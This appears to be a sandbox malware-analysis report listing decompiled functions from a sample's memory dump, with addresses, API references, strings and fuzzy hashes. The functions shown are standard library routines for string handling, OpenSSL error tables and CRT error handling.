				void* _t258;
				void* _t259;

				_t200 = __ecx;
				_t259 = _t258 - 8;
				_t251 = __ecx;
				_t244 = _a4;
				_t128 =  *(__ecx + 0x10);
				if(_t128 < _t244) {
					L86:
					_push("invalid string position");
					E0044F26C(__eflags);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return  *((intOrPtr*)(_t200 + 0x10));
				} else {
					_t226 = _a16;
					_t200 =  *((intOrPtr*)(_a12 + 0x10));
					if(_t200 < _t226) {
						goto L86;
					} else {
						_v8 = _t128 - _t244;
						_t191 = _a8;
						_t192 =  <  ? _v8 : _t191;
						_v12 = _t200 - _t226;
						_a8 =  <  ? _v8 : _t191;
						_t200 =  <  ? _v12 : _a20;
						_t194 = _t128 - _a8;
						_v12 = _t194;
						_t195 = _a12;
						_a20 = _t200;
						if((_t128 | 0xffffffff) - _t200 <= _t194) {
							_push("string too long");
							E0044F23E(__eflags);
							goto L86;
						} else {
							_t134 = _a8;
							_t246 = _v12 + _t200;
							_v8 = _v8 - _t134;
							_v12 = _t246;
							_t247 = _a4;
							if( *(__ecx + 0x10) < _t246) {
								E00415D50(_t195, __ecx, _t247, __ecx, _v12, 0);
								_t200 = _a20;
								_t226 = _a16;
								_t134 = _a8;
							}
							if(_t251 == _t195) {
								_t196 = _a20;
								__eflags = _t196 - _t134;
								if(_t196 > _t134) {
									__eflags = _t226 - _t247;
									if(_t226 > _t247) {
										_t203 = _t247 + _t134;
										_a4 = _t203;
										__eflags = _t203 - _t226;
										if(_t203 > _t226) {
											_t204 =  *((intOrPtr*)(_t251 + 0x14));
											__eflags = _t204 - 8;
											if(_t204 < 8) {
												_a12 = _t251;
											} else {
												_a12 =  *_t251;
												_t196 = _a20;
											}
											__eflags = _t204 - 8;
											if(_t204 < 8) {
												_t205 = _t251;
											} else {
												_t205 =  *_t251;
											}
											E0040B600(_t205 + _t247 * 2, _a12 + _t226 * 2, _t134);
											_t207 =  *((intOrPtr*)(_t251 + 0x14));
											__eflags = _t207 - 8;
											if(_t207 < 8) {
												_t137 = _t251;
											} else {
												_t137 =  *_t251;
											}
											__eflags = _t207 - 8;
											if(_t207 < 8) {
												_t208 = _t251;
											} else {
												_t208 =  *_t251;
											}
											_a20 = _a4 + _a4;
											E0040B600(_t208 + (_t247 + _t196) * 2, _a4 + _a4 + _t137, _v8);
											_t140 =  *((intOrPtr*)(_t251 + 0x14));
											__eflags = _t140 - 8;
											if(_t140 < 8) {
												_t231 = _t251;
											} else {
												_t231 =  *_t251;
											}
											__eflags = _t140 - 8;
											if(_t140 < 8) {
												_t210 = _t251;
											} else {
												_t210 =  *_t251;
											}
											_push(_t196 - _a8);
											_t144 = _a16 + _t196;
											_t211 = _t210 + _a20;
											__eflags = _t210 + _a20;
										} else {
											_t149 =  *((intOrPtr*)(_t251 + 0x14));
											__eflags = _t149 - 8;
											if(_t149 < 8) {
												_t235 = _t251;
											} else {
												_t235 =  *_t251;
											}
											__eflags = _t149 - 8;
											if(_t149 < 8) {
												_t213 = _t251;
											} else {
												_t213 =  *_t251;
											}
											E0040B600(_t213 + (_t247 + _t196) * 2, _t235 + _a4 * 2, _v8);
											_t153 =  *((intOrPtr*)(_t251 + 0x14));
											__eflags = _t153 - 8;
											if(_t153 < 8) {
												_t231 = _t251;
											} else {
												_t231 =  *_t251;
											}
											__eflags = _t153 - 8;
											if(_t153 < 8) {
												_push(_t196);
												_t144 = _a16 - _a8 + _t196;
												_t211 = _t251 + _t247 * 2;
											} else {
												_push(_t196);
												_t144 = _a16 - _a8 + _t196;
												_t211 =  *_t251 + _t247 * 2;
											}
										}
									} else {
										_t158 =  *((intOrPtr*)(_t251 + 0x14));
										__eflags = _t158 - 8;
										if(_t158 < 8) {
											_t237 = _t251;
										} else {
											_t237 =  *_t251;
										}
										__eflags = _t158 - 8;
										if(_t158 < 8) {
											_t217 = _t251;
										} else {
											_t217 =  *_t251;
										}
										E0040B600(_t217 + (_t247 + _t196) * 2, _t237 + (_a8 + _t247) * 2, _v8);
										_t163 =  *((intOrPtr*)(_t251 + 0x14));
										__eflags = _t163 - 8;
										if(_t163 < 8) {
											_t231 = _t251;
										} else {
											_t231 =  *_t251;
										}
										__eflags = _t163 - 8;
										if(_t163 < 8) {
											_t144 = _a16;
											_push(_t196);
											_t211 = _t251 + _t247 * 2;
										} else {
											_t144 = _a16;
											_push(_t196);
											_t211 =  *_t251 + _t247 * 2;
										}
									}
									_t232 = _t231 + _t144 * 2;
								} else {
									_t164 =  *((intOrPtr*)(_t251 + 0x14));
									__eflags = _t164 - 8;
									if(_t164 < 8) {
										_t221 = _t251;
									} else {
										_t221 =  *_t251;
									}
									__eflags = _t164 - 8;
									if(_t164 < 8) {
										_t165 = _t251;
									} else {
										_t165 =  *_t251;
									}
									E0040B600(_t165 + _t247 * 2, _t221 + _t226 * 2, _t196);
									_t167 =  *((intOrPtr*)(_t251 + 0x14));
									__eflags = _t167 - 8;
									if(_t167 < 8) {
										_t240 = _t251;
									} else {
										_t240 =  *_t251;
									}
									__eflags = _t167 - 8;
									if(_t167 < 8) {
										_t223 = _t251;
									} else {
										_t223 =  *_t251;
									}
									_push(_v8);
									_t232 = _t240 + (_a8 + _t247) * 2;
									_t211 = _t223 + (_t247 + _t196) * 2;
								}
								E0040B600(_t211, _t232);
							} else {
								_t171 =  *((intOrPtr*)(_t251 + 0x14));
								if(_t171 < 8) {
									_a4 = _t251;
								} else {
									_a4 =  *_t251;
								}
								if(_t171 < 8) {
									_t241 = _t251;
								} else {
									_t241 =  *_t251;
								}
								_t172 = _v8;
								if(_v8 != 0) {
									E004205A0(_t241 + (_t247 + _t200) * 2, _a4 + (_a8 + _t247) * 2, _t172 + _t172);
									_t195 = _a12;
									_t259 = _t259 + 0xc;
								}
								if( *((intOrPtr*)(_t195 + 0x14)) >= 8) {
									_t195 =  *_t195;
								}
								if( *((intOrPtr*)(_t251 + 0x14)) < 8) {
									_t224 = _t251;
								} else {
									_t224 =  *_t251;
								}
								_t173 = _a20;
								if(_a20 != 0) {
									E0042D8D0(_t224 + _t247 * 2, _t195 + _a16 * 2, _t173 + _t173);
								}
							}
							_t212 = _v12;
							 *(_t251 + 0x10) = _t212;
							if( *((intOrPtr*)(_t251 + 0x14)) < 8) {
								_t146 = _t251;
								__eflags = 0;
								 *((short*)(_t146 + _t212 * 2)) = 0;
								return _t146;
							} else {
								 *((short*)( *_t251 + _t212 * 2)) = 0;
								return _t251;
							}
						}
					}
				}
			}

0x00414920
0x00414923
0x00414927
0x0041492a
0x0041492d
0x00414932
0x00414c3d
0x00414c3d
0x00414c42
0x00414c47
0x00414c48
0x00414c49
0x00414c4a
0x00414c4b
0x00414c4c
0x00414c4d
0x00414c4e
0x00414c4f
0x00414c53
0x00414938
0x00414938
0x0041493f
0x00414944
0x00000000
0x0041494a
0x0041494e
0x00414951
0x00414957
0x0041495d
0x00414966
0x0041496b
0x00414972
0x00414977
0x0041497c
0x0041497f
0x00414982
0x00414c33
0x00414c38
0x00000000
0x00414988
0x0041498b
0x0041498e
0x00414990
0x00414996
0x00414999
0x0041499c
0x004149a5
0x004149aa
0x004149ad
0x004149b0
0x004149b0
0x004149b5
0x00414a36
0x00414a39
0x00414a3b
0x00414a94
0x00414a96
0x00414af9
0x00414afc
0x00414aff
0x00414b01
0x00414b6c
0x00414b6f
0x00414b72
0x00414b7e
0x00414b74
0x00414b76
0x00414b79
0x00414b79
0x00414b81
0x00414b84
0x00414b8a
0x00414b86
0x00414b86
0x00414b86
0x00414b96
0x00414b9b
0x00414ba1
0x00414ba4
0x00414baa
0x00414ba6
0x00414ba6
0x00414ba6
0x00414bac
0x00414baf
0x00414bb5
0x00414bb1
0x00414bb1
0x00414bb1
0x00414bbf
0x00414bca
0x00414bcf
0x00414bd5
0x00414bd8
0x00414bde
0x00414bda
0x00414bda
0x00414bda
0x00414be0
0x00414be3
0x00414be9
0x00414be5
0x00414be5
0x00414be5
0x00414bf0
0x00414bf4
0x00414bf6
0x00414bf6
0x00414b03
0x00414b03
0x00414b06
0x00414b09
0x00414b0f
0x00414b0b
0x00414b0b
0x00414b0b
0x00414b11
0x00414b14
0x00414b1a
0x00414b16
0x00414b16
0x00414b16
0x00414b2b
0x00414b30
0x00414b36
0x00414b39
0x00414b3f
0x00414b3b
0x00414b3b
0x00414b3b
0x00414b41
0x00414b44
0x00414b61
0x00414b62
0x00414b64
0x00414b46
0x00414b4e
0x00414b4f
0x00414b51
0x00414b51
0x00414b44
0x00414a98
0x00414a98
0x00414a9b
0x00414a9e
0x00414aa4
0x00414aa0
0x00414aa0
0x00414aa0
0x00414aa6
0x00414aa9
0x00414aaf
0x00414aab
0x00414aab
0x00414aab
0x00414ac2
0x00414ac7
0x00414acd
0x00414ad0
0x00414ad6
0x00414ad2
0x00414ad2
0x00414ad2
0x00414ad8
0x00414adb
0x00414aeb
0x00414af0
0x00414af1
0x00414add
0x00414adf
0x00414ae2
0x00414ae3
0x00414ae3
0x00414adb
0x00414bf9
0x00414a3d
0x00414a3d
0x00414a40
0x00414a43
0x00414a49
0x00414a45
0x00414a45
0x00414a45
0x00414a4b
0x00414a4e
0x00414a54
0x00414a50
0x00414a50
0x00414a50
0x00414a5d
0x00414a62
0x00414a68
0x00414a6b
0x00414a71
0x00414a6d
0x00414a6d
0x00414a6d
0x00414a73
0x00414a76
0x00414a7c
0x00414a78
0x00414a78
0x00414a78
0x00414a81
0x00414a86
0x00414a8c
0x00414a8c
0x00414bfc
0x004149b7
0x004149b7
0x004149bd
0x004149c6
0x004149bf
0x004149c1
0x004149c1
0x004149cc
0x004149d2
0x004149ce
0x004149ce
0x004149ce
0x004149d4
0x004149d9
0x004149f1
0x004149f6
0x004149f9
0x004149f9
0x00414a00
0x00414a02
0x00414a02
0x00414a08
0x00414a0e
0x00414a0a
0x00414a0a
0x00414a0a
0x00414a10
0x00414a15
0x00414a29
0x00414a2e
0x00414a15
0x00414c08
0x00414c0b
0x00414c0f
0x00414c23
0x00414c25
0x00414c29
0x00414c30
0x00414c11
0x00414c16
0x00414c20
0x00414c20
0x00414c0f
0x00414982
0x00414944

APIs

_memmove.LIBCMT ref: 004149F1

Strings

string too long, xrefs: 00414C33
invalid string position, xrefs: 00414C3D

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00417D50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00417D50(signed int __ebx, intOrPtr* __ecx, signed int _a4, signed int _a8, intOrPtr* _a12, signed int _a16) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v20;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t64;
				signed int _t67;
				signed int _t69;
				signed int _t71;
				signed int _t73;
				signed int _t76;
				intOrPtr _t82;
				intOrPtr _t88;
				intOrPtr* _t96;
				intOrPtr* _t99;
				signed int _t101;
				intOrPtr _t102;
				signed int _t105;
				signed int _t109;
				signed int _t113;
				intOrPtr _t118;
				intOrPtr* _t120;
				void* _t122;
				signed int _t123;
				intOrPtr* _t124;
				intOrPtr* _t125;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr _t131;
				void* _t132;
				intOrPtr* _t142;
				signed int _t144;
				void* _t151;

				_t101 = __ebx;
				_t130 = _a12;
				_t142 = __ecx;
				if(_t130 == 0) {
					L13:
					_t64 =  *(_t142 + 0x10);
					_t109 = _a4;
					__eflags = _t64 - _t109;
					if(__eflags < 0) {
						_push("invalid string position");
						E0044F26C(__eflags);
						goto L44;
					} else {
						_t122 = _t64 - _t109;
						_t109 = _a16;
						_push(_t101);
						_t105 = _a8;
						__eflags = _t122 - _t105;
						_t101 =  <  ? _t122 : _t105;
						_t73 = _t64 - _t101;
						_a8 = _t73;
						__eflags = (_t73 | 0xffffffff) - _t109 - _a8;
						if(__eflags <= 0) {
							L44:
							_push("string too long");
							E0044F23E(__eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t101);
							_push(_t142);
							_push(_t130);
							_t131 = _v20;
							__eflags =  *((intOrPtr*)(_t109 + 0x10)) - _t131;
							_t132 =  <  ?  *((void*)(_t109 + 0x10)) : _t131;
							__eflags =  *((intOrPtr*)(_t109 + 0x14)) - 8;
							if( *((intOrPtr*)(_t109 + 0x14)) >= 8) {
								_t109 =  *_t109;
							}
							_t102 = _a12;
							__eflags = _t132 - _t102;
							_t144 =  <  ? _t132 : _t102;
							__eflags = _t144;
							if(_t144 == 0) {
								L51:
								_t67 = 0;
								__eflags = 0;
							} else {
								_t120 = _a8;
								while(1) {
									__eflags =  *_t109 -  *_t120;
									if( *_t109 !=  *_t120) {
										break;
									}
									_t109 = _t109 + 2;
									_t120 = _t120 + 2;
									_t144 = _t144 - 1;
									__eflags = _t144;
									if(_t144 != 0) {
										continue;
									} else {
										goto L51;
									}
									goto L52;
								}
								_t71 =  *_t109 & 0x0000ffff;
								__eflags = _t71 -  *_t120;
								asm("sbb eax, eax");
								_t67 = (_t71 & 0xfffffffe) + 1;
							}
							L52:
							__eflags = _t67;
							if(_t67 != 0) {
								L57:
								return _t67;
							} else {
								__eflags = _t132 - _t102;
								if(_t132 >= _t102) {
									__eflags = _t132 - _t102;
									_t63 = _t132 != _t102;
									__eflags = _t63;
									_t67 = 0 | _t63;
									goto L57;
								} else {
									_t69 = _t67 | 0xffffffff;
									__eflags = _t69;
									return _t69;
								}
							}
						} else {
							_t123 = _t122 - _t101;
							_v12 = _t123;
							__eflags = _t109 - _t101;
							if(_t109 < _t101) {
								_t88 =  *((intOrPtr*)(_t142 + 0x14));
								__eflags = _t88 - 8;
								if(_t88 < 8) {
									_a8 = _t142;
								} else {
									_a8 =  *_t142;
									_t130 = _a12;
								}
								__eflags = _t88 - 8;
								if(_t88 < 8) {
									_v8 = _t142;
								} else {
									_v8 =  *_t142;
								}
								__eflags = _t123;
								if(_t123 != 0) {
									E004205A0(_v8 + (_a4 + _t109) * 2, _a8 + (_a4 + _t101) * 2, _t123 + _t123);
									_t130 = _a12;
									_t151 = _t151 + 0xc;
									_t109 = _a16;
								}
							}
							__eflags = _t109;
							if(_t109 != 0) {
								L26:
								_a8 = _t109 - _t101 +  *(_t142 + 0x10);
								_t76 = E00415D50(_t101, _t142, _t130, _t142, _t109 - _t101 +  *(_t142 + 0x10), 0);
								__eflags = _t76;
								if(_t76 != 0) {
									_t113 = _a16;
									__eflags = _t101 - _t113;
									if(_t101 >= _t113) {
										_t107 = _a4;
									} else {
										_t82 =  *((intOrPtr*)(_t142 + 0x14));
										__eflags = _t82 - 8;
										if(_t82 < 8) {
											_t125 = _t142;
										} else {
											_t125 =  *_t142;
										}
										__eflags = _t82 - 8;
										if(_t82 < 8) {
											_a12 = _t142;
										} else {
											_a12 =  *_t142;
										}
										_t107 = _a4;
										E0040B600(_a12 + (_a4 + _t113) * 2, _t125 + (_a4 + _t101) * 2, _v12);
										_t113 = _a16;
										_t151 = _t151 + 4;
									}
									__eflags =  *((intOrPtr*)(_t142 + 0x14)) - 8;
									if( *((intOrPtr*)(_t142 + 0x14)) < 8) {
										_t124 = _t142;
									} else {
										_t124 =  *_t142;
									}
									__eflags = _t113;
									if(_t113 != 0) {
										E0042D8D0(_t124 + _t107 * 2, _t130, _t113 + _t113);
									}
									E00414DF0(_t142, _a8);
								}
							} else {
								__eflags = _t101;
								if(_t101 != 0) {
									goto L26;
								}
							}
							return _t142;
						}
					}
				} else {
					_t118 =  *((intOrPtr*)(__ecx + 0x14));
					if(_t118 < 8) {
						_t96 = __ecx;
					} else {
						_t96 =  *__ecx;
					}
					if(_t130 < _t96) {
						goto L13;
					} else {
						if(_t118 < 8) {
							_t128 = _t142;
						} else {
							_t128 =  *_t142;
						}
						if(_t128 +  *(_t142 + 0x10) * 2 <= _t130) {
							goto L13;
						} else {
							if(_t118 < 8) {
								_t99 = _t142;
							} else {
								_t99 =  *_t142;
							}
							return E00414920(_t101, _t142, _t130 - _t99 >> 1, _t142, _a4, _a8, _t142, _t130 - _t99 >> 1, _a16);
						}
					}
				}
			}

0x00417d50
0x00417d58
0x00417d5b
0x00417d5f
0x00417db1
0x00417db1
0x00417db4
0x00417db7
0x00417db9
0x00417edf
0x00417ee4
0x00000000
0x00417dbf
0x00417dc1
0x00417dc3
0x00417dc6
0x00417dc7
0x00417dca
0x00417dcc
0x00417dcf
0x00417dd1
0x00417dd9
0x00417ddc
0x00417ee9
0x00417ee9
0x00417eee
0x00417ef3
0x00417ef4
0x00417ef5
0x00417ef6
0x00417ef7
0x00417ef8
0x00417ef9
0x00417efa
0x00417efb
0x00417efc
0x00417efd
0x00417efe
0x00417eff
0x00417f03
0x00417f04
0x00417f05
0x00417f06
0x00417f09
0x00417f0c
0x00417f10
0x00417f14
0x00417f16
0x00417f16
0x00417f18
0x00417f1b
0x00417f1f
0x00417f22
0x00417f24
0x00417f41
0x00417f41
0x00417f41
0x00417f26
0x00417f26
0x00417f30
0x00417f33
0x00417f36
0x00000000
0x00000000
0x00417f38
0x00417f3b
0x00417f3e
0x00417f3e
0x00417f3f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00417f3f
0x00417f55
0x00417f58
0x00417f5b
0x00417f60
0x00417f60
0x00417f43
0x00417f43
0x00417f45
0x00417f6a
0x00417f6e
0x00417f47
0x00417f47
0x00417f49
0x00417f65
0x00417f67
0x00417f67
0x00417f67
0x00000000
0x00417f4b
0x00417f4d
0x00417f4d
0x00417f52
0x00417f52
0x00417f49
0x00417de2
0x00417de2
0x00417de4
0x00417de7
0x00417de9
0x00417deb
0x00417dee
0x00417df1
0x00417dfd
0x00417df3
0x00417df5
0x00417df8
0x00417df8
0x00417e00
0x00417e03
0x00417e0c
0x00417e05
0x00417e07
0x00417e07
0x00417e0f
0x00417e11
0x00417e2e
0x00417e33
0x00417e36
0x00417e39
0x00417e39
0x00417e11
0x00417e3c
0x00417e3e
0x00417e48
0x00417e4f
0x00417e55
0x00417e5a
0x00417e5c
0x00417e5e
0x00417e61
0x00417e63
0x00417ea6
0x00417e65
0x00417e65
0x00417e68
0x00417e6b
0x00417e71
0x00417e6d
0x00417e6d
0x00417e6d
0x00417e73
0x00417e76
0x00417e7f
0x00417e78
0x00417e7a
0x00417e7a
0x00417e8a
0x00417e99
0x00417e9e
0x00417ea1
0x00417ea1
0x00417ea9
0x00417ead
0x00417eb3
0x00417eaf
0x00417eaf
0x00417eaf
0x00417eb5
0x00417eb7
0x00417ec2
0x00417ec7
0x00417ecf
0x00417ecf
0x00417e40
0x00417e40
0x00417e42
0x00000000
0x00000000
0x00417e42
0x00417edc
0x00417edc
0x00417ddc
0x00417d61
0x00417d61
0x00417d67
0x00417d6d
0x00417d69
0x00417d69
0x00417d69
0x00417d71
0x00000000
0x00417d73
0x00417d76
0x00417d7c
0x00417d78
0x00417d78
0x00417d78
0x00417d86
0x00000000
0x00417d88
0x00417d8b
0x00417d91
0x00417d8d
0x00417d8d
0x00417d8d
0x00417dae
0x00417dae
0x00417d86
0x00417d71

APIs

_memmove.LIBCMT ref: 00417E2E

Strings

string too long, xrefs: 00417EE9
invalid string position, xrefs: 00417EDF

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
Opcode Fuzzy Hash: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9

Uniqueness

Uniqueness Score: -1.00%

Function 004516A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004516A0(void* __ebx, void* __edi) {
				char* _t6;
				intOrPtr _t12;
				void* _t14;
				char* _t16;
				char** _t19;
				void* _t21;
				void* _t22;
				void* _t23;

				E004547A0(_t14, __edi, 5, 1, ".\\crypto\\err\\err.c", 0x244);
				_t22 = _t21 + 0x10;
				if( *0x50b6d4 != 0) {
					E004547A0(_t14, __edi, 6, 1, ".\\crypto\\err\\err.c", 0x24b);
					E004547A0(_t14, __edi, 9, 1, ".\\crypto\\err\\err.c", 0x24c);
					_t23 = _t22 + 0x20;
					__eflags =  *0x50b6d4;
					if( *0x50b6d4 != 0) {
						_push(__ebx);
						_push(__edi);
						_t12 = 1;
						_t16 = 0x5117e0;
						_t19 = 0x5113e4;
						do {
							__eflags =  *_t19;
							 *((intOrPtr*)(_t19 - 4)) = _t12;
							if(__eflags == 0) {
								_push(_t12);
								_t6 = E004C5D39(_t12, _t14, __eflags);
								_t23 = _t23 + 4;
								__eflags = _t6;
								if(_t6 != 0) {
									E004C5E00(_t16, _t6, 0x20);
									_t23 = _t23 + 0xc;
									_t16[0x1f] = 0;
									 *_t19 = _t16;
								}
								__eflags =  *_t19;
								if( *_t19 == 0) {
									 *_t19 = "unknown";
								}
							}
							_t19 =  &(_t19[2]);
							_t12 = _t12 + 1;
							_t16 =  &(_t16[0x20]);
							__eflags = _t19 - 0x5117d4;
						} while (_t19 <= 0x5117d4);
						 *0x50b6d4 = 0;
						return E004547A0(_t14, _t16, 0xa, 1, ".\\crypto\\err\\err.c", 0x26c);
					} else {
						return E004547A0(_t14, __edi, 0xa, 1, ".\\crypto\\err\\err.c", 0x24f);
					}
				} else {
					return E004547A0(_t14, __edi, 6, 1, ".\\crypto\\err\\err.c", 0x247);
				}
			}

0x004516ae
0x004516b3
0x004516bd
0x004516e4
0x004516f7
0x004516fc
0x004516ff
0x00451706
0x0045171f
0x00451721
0x00451722
0x00451727
0x0045172c
0x00451731
0x00451731
0x00451734
0x00451737
0x00451739
0x0045173a
0x0045173f
0x00451742
0x00451744
0x0045174a
0x0045174f
0x00451752
0x00451756
0x00451756
0x00451758
0x0045175b
0x0045175d
0x0045175d
0x0045175b
0x00451763
0x00451766
0x00451767
0x0045176a
0x0045176a
0x00451780
0x00451795
0x00451708
0x0045171e
0x0045171e
0x004516bf
0x004516d5
0x004516d5

Strings

.\crypto\err\err.c, xrefs: 004516A5, 004516C4, 004516DB, 004516EE, 0045170D, 00451777
unknown, xrefs: 0045175D

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID:
String ID: .\crypto\err\err.c$unknown
API String ID: 0-565200744
Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E

Uniqueness

Uniqueness Score: -1.00%

Function 00424168 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 74%

			E00424168(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				char _v800;
				signed int _v804;
				intOrPtr _v808;
				char _v812;
				void* __edi;
				signed int _t41;
				char* _t46;
				char* _t48;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t59 = __ebx;
				_t41 =  *0x50ad20; // 0xcafe2c1d
				_t42 = _t41 ^ _t69;
				_v8 = _t41 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00432A69(_t42);
					_pop(_t60);
				}
				_v804 = _v804 & 0x00000000;
				E0042B420( &_v800, 0, 0x4c);
				_v812 =  &_v804;
				_t46 =  &_v724;
				_v808 = _t46;
				_v548 = _t46;
				_v552 = _t60;
				_v556 = _t65;
				_v560 = _t59;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t23);
				_v540 = _v0;
				_t48 =  &_v0;
				_v528 = _t48;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t48 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				if(E004329EC( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E00432A69(_t55);
				}
				return E0042A77E(_t59, _v8 ^ _t69, _t65, _t67, _t68);
			}

0x00424168
0x00424168
0x00424168
0x00424171
0x00424176
0x00424178
0x00424180
0x00424182
0x00424185
0x0042418a
0x0042418a
0x0042418b
0x0042419d
0x004241ab
0x004241b1
0x004241b7
0x004241bd
0x004241c3
0x004241c9
0x004241cf
0x004241d5
0x004241db
0x004241e1
0x004241e8
0x004241ef
0x004241f6
0x004241fd
0x00424204
0x0042420b
0x0042420c
0x00424215
0x0042421b
0x0042421e
0x00424224
0x00424231
0x0042423a
0x00424243
0x0042424c
0x00424258
0x00424269
0x00424275
0x00424278
0x0042427d
0x0042428c

APIs

_memset.LIBCMT ref: 0042419D
IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252

Strings

i;B, xrefs: 00424168

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: DebuggerPresent_memset
String ID: i;B
API String ID: 2328436684-472376889
Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59

Uniqueness

Uniqueness Score: -1.00%

Function 0042A77E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E0042A77E(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v808;
				int _t9;
				intOrPtr _t14;
				signed int _t15;
				signed int _t17;
				signed int _t19;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr* _t30;
				intOrPtr* _t32;
				void* _t35;

				_t28 = __esi;
				_t27 = __edi;
				_t26 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
